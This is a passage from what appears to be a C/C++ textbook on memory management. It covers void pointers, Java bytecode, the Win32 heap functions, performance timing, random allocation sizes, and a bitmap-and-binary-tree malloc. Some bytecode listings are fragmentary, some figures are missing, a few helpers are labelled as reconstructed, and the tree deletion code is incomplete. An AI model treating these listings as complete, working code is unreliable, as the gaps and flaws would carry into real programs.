{
char *cptr;
cptr = malloc(16);
strcpy(cptr,"now a string");
return(cptr);
}/*end function3*/
void* function2()
{
void *fptr;
fptr = function4;
return(fptr);
}/*end function2*/
void* function1()
{
int* iptr;
iptr = malloc(sizeof(int));
*iptr = 1012;
return(iptr);
}/*end function1*/
void main()
{
void *vptr;
fptr addr;
vptr = function1();
printf("%lu\n",(*((int*)vptr)));
vptr = function2();
addr = vptr;
(addr)();
vptr = function3();
printf("%s\n",(char *)vptr);
return;
}/*end main*/
When this program is executed, the following output is generated:
1012
called function4()
now a string
When it comes to pointers of type void, you often cannot tell what
is being referenced. The first call (i.e., function1()) returns the
address of an integer. The second call (i.e., function2()) returns
the address of a function. The third call (i.e., function3())
returns the address of a string. Without looking at the function
implementations themselves, you would have no idea what kind of
value you are dealing with.
Case Study: Java

Language Features
Java is an object-oriented (OO) language. Specifically, it is a fairly
puritanical OO language. With the exception of atomic data types,
like char or int, everything is instantiated as an object. In addi-
tion, there are no stand-alone functions in Java; every function must
belong to a class. Like other OO languages, Java supports certain
kinds of object encapsulation, polymorphism, and inheritance. How-
ever, the Java compiler (javac) also enforces a number of
conventions that make it much easier to manage large projects.
Having worked at an ERP company that maintained a code base
consisting of 16 million lines of K&R C, I dread the prospect of
hunting down header files and obscure libraries, which were invari-
ably spread across a massive, cryptic, and completely
undocumented source tree. In the past, sometimes I would spend
several hours just trying to find one source file or function defini-
tion. There were times where I would start grep at the root of a
machine’s file system and go have lunch. In fact, I distinctly remem-
ber spending an entire afternoon trying to locate the following
macro:
#define PrcBInNdNbr 14
Some engineers dislike this kind of enforced organizational
scheme, claiming that it is a characteristic of a bondage-discipline
language. These engineers have obviously never worked on a large
project. On a large project, you need to maintain organization, even
if it is instituted at the cost of flexibility. Sometimes, the only thing
between a million lines of code and absolute chaos is a set of
well-enforced conventions.
In the past, it has been up to the software engineers involved on
a project to be good citizens and obey the informal organizational
schemes. However, there was usually nothing stopping a program-
mer from breaking the rules and introducing complexity into the
system. Sure enough, there’s always at least one guy who has to do
things “his way.” As part of the language’s masterful design, the
founding fathers at JavaSoft decided that the Java run time would
take an active role in maintaining an organized source tree by
enforcing the package directory naming scheme.
Another design decision that the founding fathers made was to
eliminate explicit pointer manipulation. This was another wise deci-
sion. As you saw from the example in the last section, pointers are
easy to abuse. A sufficient dose of pointer arithmetic can make
source code both ambiguous and platform dependent. By allowing
only implicit references to objects, Java is able to safeguard pro-
grams from all sorts of pointer tomfoolery.
Finally, I think that Gosling had C++ in mind when he decided
that Java would not support multiple inheritance and operator over-
loading. As far as complexity is concerned, these two features tend
to make matters worse instead of making them better. There is
nothing scarier than looking at the twisting cyclic relationships that
multiple inheritance can produce in a large class hierarchy (see
Figure 3.16).

Figure 3.16
Objects are really just the sum of their field values. Two different
objects of the same type can share the same method area because it
is their field values that distinguish them. To give you a feel for this,
the following code shows how you could implement this type of
setup in C:
/* --objects.c-- */
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
struct MyObject
{
int value;
char name[16];
};
/* constructor(), setValues(), and toString() are reconstructed
   here from the way that main() uses them */

struct MyObject* constructor()
{
    struct MyObject *ptr;
    ptr = (struct MyObject*)malloc(sizeof(struct MyObject));
    return(ptr);
}/*end constructor*/

void setValues(struct MyObject *ptr, int value, char *name)
{
    (*ptr).value = value;
    strcpy((*ptr).name,name);
    return;
}/*end setValues*/

void toString(struct MyObject *ptr)
{
    printf("value=%d, name=%s\n",(*ptr).value,(*ptr).name);
    return;
}/*end toString*/
void main()
{
struct MyObject *obj1;
struct MyObject *obj2;
obj1 = constructor();
setValues(obj1,5,"object1");
toString(obj1);
obj2 = constructor();
setValues(obj2,6,"object2");
toString(obj2);
return;
}/*end main*/
If this program is executed, the following output will be produced:
value=5, name=object1
value=6, name=object2
The objects in this case are collections of fields (i.e., structures).
They both use the same member functions (i.e., constructor(),
setValues(), toString()), but they are different because
their fields are different.
The best way to see how a Java application uses memory ser-
vices in practice is to take a small Java program, disassemble it, and
examine its bytecode entrails. The program in question, a class
named MemDemo, is presented below one method at a time, with
each method followed by its bytecode.
Instruction opcodes that are prefixed by a hash sign (i.e., “#”) rep-
resent indices into the run-time constant pool. The item that the
index references is placed in brackets to the right of the instruction
(i.e., <Method Memdemo(int)>). I will also sprinkle the assem-
bler with single- and double-line comments to help explain what is
going on.
Execution begins in the main() method:
public static void main(String[] args)
{
MemDemo md = new MemDemo(11);
System.out.println("sum="+md.demoFrameUsage(1));
return;
}/*end main*/
Method void main(java.lang.String[])
0 new #4 <Class MemDemo> //create an object, don't initialize
3 dup //duplicate top operand, push on stack
4 bipush 11 //push argument (11) on stack
6 invokespecial #5 <Method MemDemo(int)> //initialize object we
just created
9 astore_1 //save reference to md object
20 ldc #9 <String "sum="> //push reference to literal on stack
22 invokevirtual #10 <Method java.lang.StringBuffer append(java.
lang.String)>
Method MemDemo(int)
0 aload_0 //push reference to 'this' on stack
1 invokespecial #1 <Method java.lang.Object()> //call superclass
constructor
4 aload_0 //push reference to 'this' on stack
5 iload_1 //push 'size' on stack
6 newarray int //create an integer array object
8 putfield #2 <Field int array[]> //set array field for 'this'
object
11 return
After MemDemo() has returned, the demoFrameUsage() method
is invoked next. Let’s take a look at its Java code and the associated
bytecode assembler. As before, most of the push instructions are
setups for other instructions.
public int demoFrameUsage(int first)
{
int i;
int j;
sum = 0;
for(i=0;i<array.length;i++)
{
array[i]=first;
first++;
sum = sum+array[i];
}
return(sum);
}/*end demoFrameUsage*/
35 iinc 2 1 //increment 'i' by 1
Figure 3.17
Memory Management: The Three-layer Cake
You have just spanned the spectrum of memory services that a com-
puter provides. The previous chapters have been relatively dense,
and it would be easy to let the details overwhelm you. To help illu-
minate the big picture, I am going to dedicate this section to pulling
everything together.
Memory management occurs at three levels. In the basement
lies the processor. The processor provides a set of system registers
(e.g., GDTR) and dedicated instructions (e.g., LGDT) that support
the construction of memory management data structures. These
data structures include descriptor tables, page directories, and page
tables. The processor cannot actually create these data structures;
instead, it merely supports their creation and use.
Upstairs, on the street level, is the operating system. The oper-
ating system is responsible for taking the raw materials provided by
the hardware and constructing an actual memory management
implementation. The operating system has to decide which proces-
sor features to use and to what extent. For example, both
segmentation and paging can be used to institute memory protec-
tion. The Intel Pentium supports four levels of privilege for memory
segments via the DPL field in descriptor table entries and two lev-
els of privilege for paging via the Supervisor/User flag in page table
entries. All three of the protected mode operating systems that we
looked at in Chapter 2 used paging as the primary mechanism to
implement privilege and access protocols.
Several floors up, sunning themselves on the balcony of a pent-
house suite, are the user applications. User applications have it
easy. They are insulated from the ugly details of memory manage-
ment that occur down in the boiler room. When a user application
needs memory, it sends a request to the operating system through a
third party known as the system call interface. Why leave the pent-
house for dinner when you can have the butler pick it up?
User applications view their own address space in terms of a set
of memory regions. Most applications can see a stack, heap, data
section, and code section. The extent to which they use these
regions is determined both by the development tools being used
and the run-time libraries that the applications invoke. As we saw in
this chapter, older languages tend to possess very primitive mem-
ory models. Languages like COBOL 85 and F77 really only use a
code section and a static data section. Contemporary languages, like
Java, have very sophisticated memory models that make heavy use
of the heap and stacks.
The “three-layer cake” of memory management is displayed in
Figure 3.18.
Figure 3.18
References
ANSI, X3.23-1985 (R1991), Programming Languages — COBOL.
This is the COBOL 85 ANSI standard; when someone talks
about ANSI COBOL, they are referring to this standard and the
1989 amendments.
ANSI, X3.23b-1993 (R1998), amendment to ANSI X3.23-1985,
updated with ANSI X3.23a-1989.
ANSI/ISO/IEC 1539-1:1997, Programming languages — Fortran —
Part 1: Base language.
This is the most recent FORTRAN specification.
ANSI, ISO/IEC 9899:1999, Programming languages — C.
This is the most recent C specification.
Baroudi, Carol. Mastering Cobol. 1999, Sybex, ISBN: 078212321X.
According to Carol, there are 500 billion lines of COBOL code
in existence. Unfortunately, she does not reference her sources
(bad move). I believe that the Gartner Group’s figure of 180 bil-
lion has more credibility.
Cooper, Doug. Oh! Pascal. 1993, W.W. Norton & Company, ISBN:
0393963985.
Diwan, A., D. Tarditi, and E. Moss. Memory Subsystem Performance
of Programs with Intensive Heap Allocation. 1993, Carnegie
Mellon University, Technical Report CMU-CS-93-227.
Graham, Paul. ANSI Common LISP. 1995, Prentice Hall, ISBN:
0133708756.
Joy, B. (Ed.), G. Steele, and J. Gosling. The Java Language Specifica-
tion. 2000 Addison-Wesley, ISBN: 0201310082.
Lindholm, T. and F. Yellin. The Java Virtual Machine Specification.
1999, Addison-Wesley; ISBN: 0201432943.
For a specification, and I have waded through many, this one is
not too difficult to digest. Still, you might want to have Meyer
and Downing’s book sitting next to you.
Metcalf, M. and J. Reid. Fortran 90/95 Explained. 1999, Oxford Uni-
versity Press, ISBN: 0198505582.
Meyer, J. and T. Downing. Java Virtual Machine. 1997, O’Reilly &
Associates, ISBN: 1565921941.
This is an excellent companion to the actual JVM specification.
Ritchie, Dennis M. "The Evolution of the Unix Time-sharing System."
AT&T Bell Laboratories Technical Journal 63 No. 6 Part 2, October
1984, pp. 1577-93.
Ritchie, Dennis M. The Development of the C Language. 1993, Asso-
ciation for Computing Machinery.
Tanenbaum, A. and A. Woodhull. Operating Systems: Design and
Implementation. 1997, Prentice Hall, ISBN: 0136386776.
Zorn, Benjamin. The Measured Cost of Conservative Garbage Collec-
tion. 1992, University of Colorado at Boulder, Technical Report,
CU-CS-573-92.
This is the original paper that touts the BDW garbage collector
as having “comparable” performance relative to malloc() and
free(). You can crank through the numbers yourself to see
what “comparable” means.
Zorn, B. and D. Grunwald. Empirical Measurements of Six Alloca-
tion-Intensive C Programs. 1992, University of Colorado at Boul-
der, Technical Report, CU-CS-604-92.
This paper looks at the allocation behavior of Cfrac, Espresso,
GhostScript, Gnu Awk, Perl, and Chameleon.
Zorn, B., D. Detlefs, and A. Dosser. Memory Allocation Costs in
Large C and C++ Programs. 1993, University of Colorado at
Boulder, Technical Report, CU-CS-665-93.
This is another paper that looks at the comparable perfor-
mance of garbage collectors.
Chapter 4
Manual Memory Management
Heap memory management is defined by the requirement that
services be provided to allocate and deallocate arbitrarily sized
blocks of memory in an arbitrary order. In other words, the heap is a
free-for-all zone, and the heap manager has to be flexible enough to
deal with a number of possible requests. There are two ways to
manage the heap: manual and automatic memory management. In
this chapter, I will take an in-depth look at manual memory manage-
ment and how it is implemented in practice.
Each of the managers in this chapter will be accessed through the
same set of wrapper functions, so that a test driver can look like:

void main()
{
char *cptr;
initMemMgr();
cptr = newMalloc(10);
if(cptr==NULL){ printf("allocation failed!\n"); }
newFree(cptr);
closeMemMgr();
return;
}
The remainder of this chapter will be devoted to describing three
different approaches. In each case, I will present the requisite back-
ground theory, offer a concrete implementation, provide a test
driver, and look at associated trade-offs. Along the way, I will also
discuss performance measuring techniques and issues related to
program simulation.
Figure 4.1
Figure 4.2
The Win32 API provides functions along the following lines for
obtaining and managing heap storage:

HANDLE GetProcessHeap(VOID);
LPVOID HeapAlloc(HANDLE hHeap, DWORD dwFlags, DWORD dwBytes);
LPVOID HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem,
DWORD dwBytes);
DWORD HeapSize(HANDLE hHeap, DWORD dwFlags, LPCVOID lpMem);
BOOL HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem);
Here is a short example to give you a feel for how these functions
are utilized. In the following program, I allocate a 2MB block of
heap memory and populate it with the letter "a." Then I increase
the size of the block by 1MB (without moving the original memory
block) and repopulate the whole thing with "a."
/* --heapDemo.c-- */
#include<stdio.h>
#include<windows.h>
#define MB 1048576
#define U1 unsigned char
#define U4 unsigned long
void main()
{
HANDLE handle;
U4 *ptr;
U1 *cptr;
int i;
handle = GetProcessHeap();
if(handle==NULL)
{
printf("could not get heap handle\n");
return;
}
ptr = HeapAlloc(handle,HEAP_ZERO_MEMORY,2*MB);
if(ptr==NULL)
{
printf("HeapAlloc() failed\n");
return;
}
printf("address=%p\n",ptr);
printf("size=%lu\n",HeapSize(handle,HEAP_NO_SERIALIZE,ptr));
cptr = (U1*)ptr;
for(i=0;i<2*MB;i++){ cptr[i]='a'; }

/*increase heap by 1MB but do NOT move and fill with 'a'--*/
ptr = HeapReAlloc(handle,HEAP_REALLOC_IN_PLACE_ONLY,
ptr,3*MB);
if(ptr==NULL)
{
printf("HeapAlloc() failed\n");
return;
}
printf("address=%p\n",ptr);
printf("size=%lu\n",HeapSize(handle,HEAP_NO_SERIALIZE,ptr));
cptr = (U1*)ptr;
for(i=0;i<3*MB;i++){ cptr[i]='a'; }
if(HeapFree(handle,HEAP_NO_SERIALIZE,ptr)==0)
{
printf("HeapFree() failed\n");
return;
}
return;
}
If you value portability above more direct access to the kernel, you
could probably get away with using malloc() to allocate yourself a
large “heap,” though (see Figure 4.3) this would add an extra layer
of code between the memory management that I am going to imple-
ment and the operating system.
Figure 4.3
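For what it's worth, here is a minimal sketch of that portable route.
The initMemMgrPortable()/closeMemMgrPortable() names are
hypothetical; the point is simply that malloc() takes the place of the
Win32 heap functions as the source of the managed region:

#include<stdlib.h>

unsigned char *ram;     /* storage to be managed */
unsigned long ramSize;  /* size of the storage in bytes */

void initMemMgrPortable(unsigned long totalbytes)
{
    ram = (unsigned char*)malloc(totalbytes);
    ramSize = totalbytes;
}

void closeMemMgrPortable()
{
    free(ram);
    ram=NULL;
    ramSize=0;
}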
Keep It Simple... Stupid!
My goal in this chapter is to help you learn how to implement your
own manual memory management code. I could have very easily
gotten sidetracked with optimization, and my code would have
quickly become very hard to read (if not impossible). If you want to
see what I mean, go look at the malloc.c code for the Gnu Com-
piler Collection. It should keep you occupied for a couple of hours,
or maybe a day or two.
Hence, I had to strike a balance between performance and com-
prehension. I have decided, in the interest of keeping the learning
threshold low, that I would keep my source code as simple as possi-
ble. I will not try to impress you with syntactic acrobatics. Instead, I
intend to show you the basic idea so that you can “get it” without
seven hours of frustrating rereading. Having perused several
malloc() implementations myself, I know how demoralizing it
can be to have to decipher optimized code.
I also make the assumption that this chapter’s code will be exe-
cuting in a single-threaded environment. I know that some members
of the reading audience may be gasping at my negligence. Again, I
want to focus on memory management without being distracted by
complicated synchronization issues. Once you have a working
knowledge under your belt, you can add all the amenities. I will
leave it as an exercise to the reader to make everything thread safe.
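For example, a minimal sketch of that exercise, assuming the Win32
synchronization API (the tsMalloc()/tsFree() wrapper names are my
own invention), might look like:

#include<windows.h>

void* newMalloc(unsigned long size); /* this chapter's wrappers */
void newFree(void *ptr);

CRITICAL_SECTION memLock; /* call InitializeCriticalSection(&memLock)
                             once at startup, e.g., in initMemMgr() */

void* tsMalloc(unsigned long size)
{
    void *ptr;
    EnterCriticalSection(&memLock);
    ptr = newMalloc(size);
    LeaveCriticalSection(&memLock);
    return(ptr);
}

void tsFree(void *ptr)
{
    EnterCriticalSection(&memLock);
    newFree(ptr);
    LeaveCriticalSection(&memLock);
    return;
}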
Measuring Performance
Given that I have decided to err on the side of simplicity, it would
be interesting to see what it costs me in terms of performance rela-
tive to a commercial implementation of malloc() and free().
Although marketing people will barrage you with all sorts of
obscure metrics when they are trying to sell you something, mea-
suring performance is really not that complicated, as you will see.
NOTE There are other measures of performance that you may see
in literature, like MIPS (millions of instructions per second) and
MFLOPS (million floating-point operations per second), but these are
poor metrics that can lead to confusing comparisons. For an explana-
tion of why, see Patterson and Hennessy's book.
Naturally, there are ways to slice and dice execution time. You can
measure how much time the processor itself spends executing a
program. This may be a pertinent value if you are working on a
multitasking operating system. If you are executing a program on a
machine that is carrying a heavy load of tasks, the program under
observation may appear to run more slowly (via wall clock time)
even if it is actually running faster.
You can subdivide processor time into how much time the pro-
cessor spends executing a task in user mode and how much time
the processor spends executing a task in kernel mode. Encryption
programs spend most of their time in user space crunching num-
bers, while I/O-intensive programs spend most of their time in
kernel space interacting with the hardware.
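As an aside, here is a hedged sketch of how you could sample these
two values on Windows using the documented GetProcessTimes() call
(this snippet is mine and is not part of the chapter's test code):

#include<stdio.h>
#include<windows.h>

void main()
{
    FILETIME createTime,exitTime,kernelTime,userTime;
    ULARGE_INTEGER k,u;

    /* the code to be measured would run here */

    if(GetProcessTimes(GetCurrentProcess(),&createTime,&exitTime,
                       &kernelTime,&userTime))
    {
        /* FILETIME values count 100-nanosecond intervals */
        k.LowPart = kernelTime.dwLowDateTime;
        k.HighPart = kernelTime.dwHighDateTime;
        u.LowPart = userTime.dwLowDateTime;
        u.HighPart = userTime.dwHighDateTime;
        printf("kernel msecs = %I64u\n",k.QuadPart/10000);
        printf("user msecs = %I64u\n",u.QuadPart/10000);
    }
    return;
}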
The machine that I used to test this chapter's code
was a single-user Windows 2000 machine with a bare minimum
number of running tasks.
number of running tasks.
My hope, however, is not that the individual measurements will
mean anything by themselves. Rather, I am more interested in see-
ing how the different algorithms compare to each other. You should
notice a time differential between algorithms, as long as the other
three independent variables (hardware, tools, data) are held con-
stant. This time differential is what is important.
#include<stdio.h>
#include<time.h>
#include<windows.h>
void main()
{
unsigned long i;
time_t t1,t2;
clock_t ticks1,ticks2, dt;
unsigned long msec1,msec2;
time(&t1);
ticks1 = clock();
msec1 = GetTickCount();

/* the code being timed would execute here */

time(&t2);
ticks2 = clock();
msec2 = GetTickCount();

dt = ticks2-ticks1;
printf("number of elapsed seconds = %lu\n",(unsigned long)(t2-t1));
printf("number of clock ticks = %lu\n",dt);
printf("ticks/second = %lu\n",CLOCKS_PER_SEC);
printf("number of elapsed seconds = %lu\n",dt/CLOCKS_PER_SEC);
printf("msecs=%lu\n",msec2-msec1);
return;
}
If this program is built and run, the following type of output will be
generated:
number of elapsed seconds = 31
number of clock ticks = 30980
ticks/second = 1000
number of elapsed seconds = 30
msecs=30960
Here is a simple test program that allocates, populates, and then
releases a series of fixed-size blocks:

#include<stdlib.h>

void main()
{
unsigned int i,j;
unsigned int nblocks;
unsigned int nbytes;
unsigned char* ptrs[1024];
nbytes=4096;
nblocks=1024;
for(i=0;i<nblocks;i++)
{
ptrs[i]=malloc(nbytes);
for(j=0;j<nbytes;j++)
{
char *cptr;
cptr = ptrs[i];
cptr[j] = 'a';
}
}
for(i=0;i<nblocks;i++)
{
free(ptrs[i]);
}
return;
}
The previous program does not force a manager to deal with the
arbitrary requests that a heap manager normally encounters. This
kind of test is unrealistic.
On the other hand, a completely random series of allocations is
also not very realistic.
#include<stdlib.h>
void main()
{
unsigned int i,j;
unsigned int nblocks;
unsigned int nbytes;
unsigned char* ptrs[1024];
nblocks=1024;
for(i=0;i<nblocks;i++)
{
nbytes=rand();
ptrs[i]=malloc(nbytes);
for(j=0;j<nbytes;j++)
{
char *cptr;
cptr = ptrs[i];
cptr[j] = 'a';
}
}
for(i=0;i<nblocks;i++)
{
free(ptrs[i]);
}
return;
}
The distribution of allocation sizes (in bytes) that I used is given
by the following table:

16 .15 = p1
32 .20 = p2
64 .35 = p3
128 .20 = p4
256 .02 = p5
512 .04 = p6
1024 .02 = p7
4096 .02 = p8
Figure 4.4
double getU()
{
return(((double)rand())/((double)RAND_MAX));
}/*end getU*/
This code invokes the rand() function located in the C standard
library. The rand() function generates what is known as a pseudo-
random integer in the range 0 to RAND_MAX. A pseudorandom
number is one that is generated by a mathematical formula. A
well-known formula for creating random integer values is the Lin-
ear Congruential Generator (LCG), which makes use of a recursive
relationship:
x(n+1) = ( a*x(n) + b ) mod m,    for n = 0, 1, 2, 3, ...

For example, if we pick a=5, b=3, m=16, and x(0)=3, we will obtain
the following stream of values:

x(0) = 3, x(1) = 2, x(2) = 13, x(3) = 4, ...
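To make the recursive relationship concrete, here is a small
program of my own (not part of this chapter's code) that reproduces
the stream above:

#include<stdio.h>

/* x(n+1) = ( a*x(n) + b ) mod m, with a=5, b=3, m=16 */
unsigned long lcgNext(unsigned long x)
{
    return((5*x+3)%16);
}

void main()
{
    unsigned long x;
    int n;
    x = 3; /* the seed, x(0) */
    for(n=0;n<4;n++)
    {
        printf("x(%d) = %lu\n",n,x);
        x = lcgNext(x);
    }
    return;
}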
The value x(0) is known as the seed. One thing you should know about
LCGs is that they eventually begin to repeat themselves. In gen-
eral, the constants that are chosen (i.e., a, b, and m) make the
difference between a good and a bad LCG. According to Knuth, a
good LCG is:
x(n+1) = ( 3141592653*x(n) + 2718281829 ) mod 2^35,    x(0) = 0
NOTE The LCG technique for creating random numbers was discov-
ered by Dick Lehmer in 1949. Lehmer was a prominent figure in the
field of computational mathematics during the twentieth century. He
was involved with the construction of ENIAC, the first digital computer
in the United States, and was also the director of the National Bureau
of Standards’ Institute for Numerical Analysis.
Testing Methodology
Each memory manager that I implement will be subjected to two
tests: a diagnostic test and a performance test.
If you modify any of the source code that I provide, you may want
to run the diagnostic test to make sure that everything still operates
correctly. The goal of a diagnostic test is to examine the operation of
a component, so it will necessarily execute much more slowly than
a performance test. Once a memory manager has passed its diag-
nostic test, it can be barraged with a performance test.
Performance testing will be executed by an instantiation of the
PerformanceTest class. The class is used as follows:
double p[8] = {.15, .20, .35, .20, .02, .04, .02, .02};
unsigned long x[8] = {16,32,64,128,256,512,1024,4096};
struct TestData td;

td.dptr = p;
td.lptr = x;
td.samplesize = 1024; /* number of allocations; exact value assumed */
td.length = 8;

PerformanceTest pt = PerformanceTest(&td);
printf("milli-seconds=%lu\n",pt.runTest());
The PerformanceTest class, mentioned in the previous code
snippet, has the following implementation:
/* --perform.cpp-- */
struct TestData
{
double *dptr; // probability array
unsigned long *lptr; // allocation sizes
unsigned long samplesize; // # malloc() calls
unsigned long length; // size of arrays
};
class PerformanceTest
{
public:
PerformanceTest(struct TestData *tdptr);
unsigned long runTest();
private:
unsigned long nAllocations; // # of malloc() calls to make
unsigned long arraySize; // size of P(x) and x arrays
double *p; // P(x) = probability for X=x
unsigned long *x; // X = # bytes allocated
double getU();
unsigned long getRandomVariate();
void getAllocArray(unsigned long *lptr);
};
PerformanceTest::PerformanceTest(struct TestData *tdptr)
{
p = (*tdptr).dptr;
x = (*tdptr).lptr;
nAllocations = (*tdptr).samplesize;
arraySize = (*tdptr).length;
return;
}/*end constructor--------------------------------------------*/
double PerformanceTest::getU()
{
return(((double)rand())/((double)RAND_MAX));
}/*end getU---------------------------------------------------*/
unsigned long PerformanceTest::getRandomVariate()
{
unsigned long i;
double U;
double total;

U = getU();
for(i=0,total=p[0];i<=arraySize-2;i++)
{
if(U<total){ return(x[i]); }
total = total + p[i+1];
}
return(x[arraySize-1]);
/*
the above is a cleaner/slower way of doing something like:
if(U < p[0]){return(x[0]);}
else if(U <(p[0]+p[1])){return(x[1]);}
else if(U <(p[0]+p[1]+p[2])){return(x[2]);}
else if(U <(p[0]+p[1]+p[2]+p[3])){return(x[3]);}
else if(U <(p[0]+p[1]+p[2]+p[3]+p[4])){return(x[4]);}
else if(U <(p[0]+p[1]+p[2]+p[3]+p[4]+p[5])){return(x[5]);}
else if(U <(p[0]+p[1]+p[2]+p[3]+p[4]+p[5]+p[6]))
{return(x[6]);}
else{ return(x[7]);}
*/
}/*end getRandomVariate---------------------------------------*/
void PerformanceTest::getAllocArray(unsigned long *lptr)
{
unsigned long i;

for(i=0;i<nAllocations;i++)
{
lptr[i]=getRandomVariate();
}
return;
}/*end getAllocArray------------------------------------------*/
unsigned long PerformanceTest::runTest()
{
unsigned long i;
unsigned long ticks1,ticks2;
char **addr;            /* pointers returned by newMalloc() */
unsigned long *allocs;  /* requested allocation sizes */

addr = (char**)malloc(sizeof(char*)*nAllocations);
allocs = (unsigned long*)malloc(sizeof(unsigned long)*nAllocations);

getAllocArray(allocs);
initMemMgr(1024*1024);
ticks1 = GetTickCount();
for(i=0;i<nAllocations;i++)
{
addr[i] = (char *)newMalloc(allocs[i]);
if(addr[i]==NULL)
{
printf("mallco()=addr[%lu]=%lu failed\n",i,addr[i]);
exit(1);
}
}
for(i=0;i<nAllocations;i++)
{
newFree(addr[i]);
}
ticks2 = GetTickCount();
closeMemMgr();
free(addr);
free(allocs);
return(ticks2-ticks1);
}/*end runTest------------------------------------------------*/
Depending on the source files that I #include, different versions
of newMalloc() and newFree() can be used. I can also replace
newMalloc()/newFree() with the native malloc()/free()
implementations to get a baseline measurement.
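For instance, a baseline build could consist of nothing more than
pass-through wrappers, along the lines of the following sketch
(which assumes the wrapper signatures used throughout this chapter):

#include<stdlib.h>

/* pass-through wrappers: route everything to the native allocator */
void initMemMgr(unsigned long totalbytes){ return; }
void closeMemMgr(){ return; }

void* newMalloc(unsigned long size){ return(malloc(size)); }
void newFree(void *ptr){ free(ptr); return; }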
You may notice that I defer time measurement until the last pos-
sible moment. I don’t start measuring clock ticks until the instant
directly before the memory allocation calls start occurring. This is
because I don’t want to include the time that was spent loading the
application, constructing input values, and executing shutdown
code.
I will admit that my testing code is synthetic, but my crude
approach is motivated by a need to keep my discussion limited. You
could fill up several books with an explanation and analysis of more
sophisticated performance testing methods. Per my initial design
goal (keep it simple . . . stupid), I have opted for the path of least
resistance.
There are a number of industrial-strength benchmark suites that
have been built to provide a more accurate picture of how well a
processor or application performs. For example, the TOP500
Supercomputer Sites portal (http://www.top500.org) uses
the LINPACK Benchmark to rank high-performance installations.
The LINPACK Benchmark tests the horsepower of a system by
asking it to solve a dense set of linear equations.
SPEC, the Standard Performance Evaluation Corporation, is a
nonprofit corporation registered in California that aims to “estab-
lish, maintain, and endorse a standardized set of relevant
benchmarks that can be applied to the newest generation of high-
performance computers” (quoted from SPEC’s bylaws; see
http://www.spec.org). SPEC basically sells a number of
benchmark suites that can be used to collect performance metrics.
For example, SPEC sells a CPU2000 V1.2 package that can be used
to benchmark processors. SPEC also sells a JVM98 suite to test the
performance of Java virtual machines. If you have $1,800 to spare,
you can purchase SPEC’s MAIL2000 mail server benchmark suite.
malloc() Version 1: Bitmapped Allocation

Theory

One approach to tracking heap storage is to use a bit map, where
each bit indicates whether a fixed-size block of memory is free or
reserved (see Figure 4.5).
Figure 4.5
The problem with this approach is that the bit map does not indicate
how much memory has been allocated for a given region. If you exe-
cute a command like
my_address = malloc(55);
free(my_address);
the bit map will not know how much storage to free because a bit
map has no place to record how much storage was allocated. All a
bit map can do is tell you which regions of memory are free and
which are taken. When you allocate the 55 bytes above, a certain
number of bits in the bit map will be cleared. However, once this
happens, the bit map cannot tell who owns the region and how much
memory they control.
This means that we need to augment the bit map with another
data structure that will be able to record how much memory is
reserved for each allocation. I decided to use a binary search tree
(BST) to serve this purpose. These two data structures — the bit
map and the binary search tree — complement each other nicely.
The bit map is used during the allocation phase to locate a free
memory region, and the BST is used during the release phase to
determine how many bits in the bit map to reset.
Figure 4.6
Implementation
The source code implementation of the bit map memory manager is
broken up into several files:
Table 4.2
File Use
driver.cpp contains main(), is the scene of the crime
mallocV1.cpp newMalloc(), newFree() wrappers
perform.cpp implements the PerformanceTest class
memmgr.cpp uses bitmap.cpp and tree.cpp to institute a policy
bitmap.cpp implements the bit map
tree.cpp implements the BST
tree.cpp
The BST implementation is fairly generic:
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ declarations
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
struct BiNode
{
unsigned long value; //linear address
unsigned long index; //index into bitmap [0,nbits-1]
unsigned long nreserved; //number of bits reserved
struct BiNode *left;
struct BiNode *right;
};
class BinarySearchTree
{
public:
struct BiNode *root_ptr;

void insertNode(struct BiNode **link, unsigned long val);
void insertNode(struct BiNode **link, struct BiNode *ptr);
struct BiNode* findNode(struct BiNode *link, unsigned long val);
struct BiNode* deleteSmallestNode(struct BiNode **link);
void deleteNode(struct BiNode **link, unsigned long val);
void deleteAll(struct BiNode **link);
void printTree(struct BiNode *link, int level);
int getHeight(struct BiNode *link);
};
/*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ definitions
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
void BinarySearchTree::insertNode
(
struct BiNode **link,
struct BiNode *ptr
)
{
if( (*link)==NULL )
{
(*link) = (struct BiNode*)malloc(sizeof(struct BiNode));
(*(*link)).value = (*ptr).value;
(*(*link)).index = (*ptr).index;
(*(*link)).nreserved = (*ptr).nreserved;
(*(*link)).left = NULL;
(*(*link)).right = NULL;
PRINT("insertNode(): inserting %d\n",(*ptr).value);
}
else if( (*ptr).value < (*(*link)).value)
{
PRINT("insertNode(): moving left\n",(*ptr).value);
insertNode(&((*(*link)).left),ptr);
}
else
{
PRINT("insertNode(): moving right\n",(*ptr).value);
insertNode(&((*(*link)).right),ptr);
}
return;
}/*end insertNode---------------------------------------------*/
struct BiNode* BinarySearchTree::findNode
(
struct BiNode *link,
unsigned long val
)
{
if(link==NULL){ return(NULL); }
if(val==(*link).value){ return(link); }
if(val>(*link).value)
{
return(findNode((*link).right,val));
}
else
{
return(findNode((*link).left,val));
}
}/*end findNode-----------------------------------------------*/
struct BiNode* BinarySearchTree::deleteSmallestNode(struct BiNode **link)
{
if((*(*link)).left!=NULL)
{
return(deleteSmallestNode(&((*(*link)).left)));
}
else
{
struct BiNode *temp;
temp = (*link);
(*link) = (*(*link)).right;
return(temp);
}
}/*end deleteSmallestNode-------------------------------------*/
void BinarySearchTree::deleteNode
(
struct BiNode **link,
unsigned long val
)
{
if( (*link)==NULL )
{
PRINT("deleteNode(): %d does not exist\n",val);
return;
}
if( val < (*(*link)).value )
{
deleteNode(&((*(*link)).left),val);
}
else if( val > (*(*link)).value )
{
deleteNode(&((*(*link)).right),val);
}
else
{
struct BiNode *temp;
PRINT("deleteNode(): freeing %d\n",val);
if((*(*link)).right==NULL)
{
(*link) = (*(*link)).left;
}
else if((*(*link)).left==NULL)
{
(*link) = (*(*link)).right;
}
else
{
temp = deleteSmallestNode(&((*(*link)).right));
(*(*link)).value = (*temp).value;
}
}
return;
}/*end deleteNode---------------------------------------------*/
void BinarySearchTree::deleteAll(struct BiNode **link)
{
if((*link)==NULL){ return; }
deleteAll(&((*(*link)).left));
deleteAll(&((*(*link)).right));
free((*link));
(*link)=NULL;
return;
